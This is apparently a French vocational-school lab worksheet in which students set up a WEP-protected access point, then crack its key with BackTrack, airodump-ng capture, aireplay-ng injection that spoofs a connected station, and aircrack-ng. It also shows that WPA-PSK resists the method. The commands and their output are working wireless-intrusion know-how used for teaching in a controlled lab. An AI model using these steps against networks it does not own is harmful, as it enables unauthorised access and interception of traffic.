LP CHATEAU BLANC
Transcription
LP CHATEAU BLANC
CI-11 installation et configuration de systèmes TR NOM : LP CHATEAU BLANC 45 – CHALETTE/LOING BAC PRO SEN TR THÈME : ___________________ CI 11 : ACADÉMIE D’ORLÉANS-TOURS INSTALLATION ET CONFIGURATION DE SYSTEMES TR LE WIFI OBJECTIFS : EXPLOITER LES FAILLES DE SECURITE D’UN RESEAU WIFI POUR S’Y CONNECTER Compétences : Savoirs : C3 ; C4 S0-5.2 ; S3; S4-2 ; S5-1; S5-2 Ressources : UN DVD DE BACK TRACK 5 2 CLES WIFI USB HERCULES HWGUSB2-54 ET SON CD D’INSTALLATION 2 ORDINATEURS (UN FUJITSU ET VOTRE PC D044-XX) UN ROUTEUR WIFI 7LINK INTERNET LE SUJET DU TP TP N° 2 EXPLOITER LES FAILLES D’UN RESEAU WIFI 1. Présentation du TP 7link réseau LAN et WLAN Fujitsu cartes réseau Hercules USB2 sans fil D044-XX (pirate) carte réseau RJ45 2. Configuration du WLAN du 7link 2.1. Branchement et RAZ du 7link 1) Le 7link étant branché au secteur, effectuer sa remise à zéro, en appuyant 20s sur le bouton prévu à cet effet : 1SEN-TR 1 CI-11 installation et configuration de systèmes TR 2) configurer le 7link en mode point d’accès et connecter le port RJ45 du PC Fujitsu au 7link. 3) Sur le schéma suivant, indiquer les actions à effectuer pour cela : 4) sur la documentation du 7link, retrouver l’@IP par défaut du point d’accès : 192.168.1.254 2.2. Configuration du WLAN 5) A l’aide d’un explorateur internet, se connecter à l’interface de gestion du 7link : 254 6) Aller dans IP config Wireless. Configurer le WLAN tel que : 1SEN-TR 2 CI-11 installation et configuration de systèmes TR - 2.3. Le SSID soit : testXX (XX votre numéro de poste) L’authentification soit en mode ouvert Le type de sécurité/chiffrement soit : WEP 64 bits La clé soit : 12345ABCDE Connexion au WLAN 7) A l’aide du CD d’installation de la carte réseau Wifi USB2, installer ses drivers. 8) Puis, à l’aide de l’utilitaire Wifi Station, retrouver le réseau testXX dans la liste des réseaux découverts. Compléter alors le tableau suivant : @MAC du point d’accès Niveau du signal Canal RF type sécurisé 00:d0:41:b4:4e:c5 100% 6 infrastructure Oui (WEP) 9) !!! Connecter l’ordinateur Fujitsu au réseau Wifi testXX. !!! APPELER LE PROFESSEUR !! 3. Procédure de déchiffrage de la clé WEP du réseau Wifi 10) Consulter les pages web : http://www.crack-wifi.com/tutoriel-crack-wepaircrack-ng-backtrack.php et http://blog.alexandredubois.com/2010/09/02/ tuto-cracker-une-cle-wep-backtrack-4r1/ 11) A la lecture de ces pages web, compléter l’algorigramme de la page suivante par : Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible. Laisser la fenêtre du terminal ouverte Dans le 1er terminal, nombre de « data » capturées 50000 ? Lister les interfaces wifi disponibles sur votre ordinateur Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler le point d’accès Arrêter la capture des paquets émis. Passer l’interface désirée en mode monitor. Capturer les paquets émis par le point d’accès cible. cracker la clé à partir des données collectées 1SEN-TR 3 CI-11 installation et configuration de systèmes TR début Lister les interfaces wifi disponibles sur votre ordinateur Passer l’interface désirée en mode monitor Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible. Capturer les paquets émis par le point d’accès cible. Laisser la fenêtre du terminal ouverte Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler le point d’accès Dans le 1er terminal, nombre de « data » capturées >= 50000? Arrêter la capture des paquets émis cracker la clé à partir des données collectées fin APPELER LE PROFESSEUR 1SEN-TR !! 4 CI-11 installation et configuration de systèmes TR 4. Déchiffrage de la clé WEP étapes par étapes 12) Connecter la 2de clé Wifi USB au PC D044-XX et démarrer l’ordinateur en bootant sur le DVD Back Track. Lancer l’environnement graphique de Back Track, sans installer le système d’exploitation. 4.1. Passage de l’interface wifi en mode moniteur Attention : le clavier est en querty !! 13) Configurer le clavier en mode Azerty (system préférences keyboard…) 14) dans un terminal, exécuter la commande iwconfig : root@root:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on 15) Quel est le nom de l’interface réseau sans-fil? Wlan0 16) A l’aide de la commande : airmon-ng start wlan0, passer cette interface en mode moniteur. 17) Puis, à l’aide d’un iwconfig, vérifier que l’opération s’est bien déroulée : root@root:/pentest/wireless/aircrack-ng# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on mon0 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:off 4.2. Analyse de l’environnement wifi Cette étape permet d’analyser les réseaux à portée et les machines connectées. C’est dans cette étape que l’on va déterminer le réseau dont on veut découvrir la clé WEP. 1SEN-TR 5 CI-11 installation et configuration de systèmes TR 18) A l’aide de la commande : airodump-ng --encrypt wep mon0, lancer la surveillance des réseaux encryptés en wep. compléter ci-dessous le résultat affiché : BSSID PWR Beacons #Data, #/s 58 2 CH 0 MB 00:D0:41:AF:D1:8A -36 6 BSSID STATION PWR Rate (not associated) 00:D0:41:AF:D1:8A 4C:0F:6E:E7:28:DD 00:08:D3:08:17:89 -81 -49 0 - 1 54 -54 ENC CIPHER AUTH ESSID 54 . WEP Lost WEP testXX Packets 0 0 Probes 1 2 19) Sur le résultat précédent, entourer : – en vert : le SSID de votre réseau wifi testXX – en rouge : l’@MAC de votre point d’accès – en bleu : le canal RF utilisé - en noir : l’@MAC de la station (ordinateur Fujitsu) connectée point d’accès 20) A l’aide de la commande : airodump-ng -w crackXX --channel 6 --bssid @MAC_point_d'accès mon0 , lancer la capture des paquets émis par le point d’accès 7link dont le SSID est testXX. Le fichier de capture se nommera crackXX (XX étant votre numéro de groupe). 21) !!! Laisser travailler !!! et dans un autre terminal, vérifier que ce fichier est bien créé : ls .Noter ci-dessous les fichiers contenus dans le répertoire de root : crackXX-01.cap crackXX-01.csv 4.3. crackXX-01.kismet.csv crackXX-01.kismet.netxml Desktop Stimulation du réseau cible En se faisant passer pour un équipement autorisé, on va forcer le point d’accès cible à « bavarder » avec notre machine. On récupèrera ainsi un maximum de données émises par le point d’accès wifi. 22) Lancer un terminal et à l’aide de la commande : aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b @MAC_point_d'accès mon0, stimuler le point d’accès en se faisant passer pour la station connectée. 1SEN-TR 6 CI-11 installation et configuration de systèmes TR 23) Attendre et vérifier les propositions affichées. Noter ces propositions cidessous : BSSID = 00:D0:41:AF:D1:8A Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:08:D3:08:17:89 0x0000: 0841 3a01 00d0 41af d18a 0008 d308 1789 .A:...A......... 24) Sur le résultat reporté ci-dessus, entourer l’@MAC correspondant à votre sation fujitsu. 25) Accepter la proposition en tapant Y (yes) 26) Pour augmenter le nombre de données capturées (Data) dans le premier terminal laissé ouvert (question 20), il faut simuler un trafic réseau entre Fujitsu et le point d’accès. Pour cela, depuis Fujitsu, se connecter puis se déconnecter régulièrement à l’interface Web du point d’accès et observer l’augmentation des trames capturées dans airodump –ng. 27) Surveiller l’augmentation des données capturées par airodump-ng. Dès qu’elles atteignent un nombre 50000, stopper l’injection de paquets et la capture en appuyant sur CTRL + C dans les 2 terminaux. 4.4. Déchiffrage de la clé Grâce aux données collectées à l’étape précédente, notre programme sera capable d’analyser la manière dont le point d’accès wifi « discute » avec nous pour en déduire la clé wep utilisée. 28) Lancer aircrack-ng dans un terminal et procéder au déchiffrage de la clé WEP du réseau testXX. Noter la commande (voir sites Web) et son résultat cidessous : root@root~# aircrack-ng crackXX-01.cap Opening crackXX-01.cap Read 870621 packets. # BSSID ESSID Encryption 1 00:D0:41:AF:D1:8A testXX WEP (50267 IVs) Choosing first network as target. Opening crackXX-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50267 ivs. KEY FOUND! [ 12:34:5A:BC:DE ] Decrypted correctly: 100% 1SEN-TR 7 CI-11 installation et configuration de systèmes TR 5. Pour le plus rapides 29) Configurer le WLAN tel que : - Le SSID soit caché - L’authentification soit en mode partagé - Le type de sécurité/chiffrement soit : WPA-PSK (TKIP) - La clé soit : wpa1senXX ((XX votre numéro de poste) Sur la copie d’écran ci-dessous, indiquer vos paramètres : TESTXX 30) Appliquer les modifications et redémarrer le point d’accès : 31) Pour pouvoir connecter le PC Fujitsu, en wifi, au WLAN, il faut ajouter manuellement le réseau 1SENXX dans la liste de ses réseaux favoris. En effet le SSID étant caché, ce réseau ne peut pas être découvert automatiquement. Pour cela : 1SEN-TR 8 CI-11 installation et configuration de systèmes TR Compléter l’ensemble des informations cidessous 1) A l’aide du PC D044-XX et Back Track, procéder au « crackage » de la clé WPA. Que peut-on constater ? Le nombre de données (data) capturées par airodump –n g est quasi nul on ne peut pas cracker la clé. 1SEN-TR 9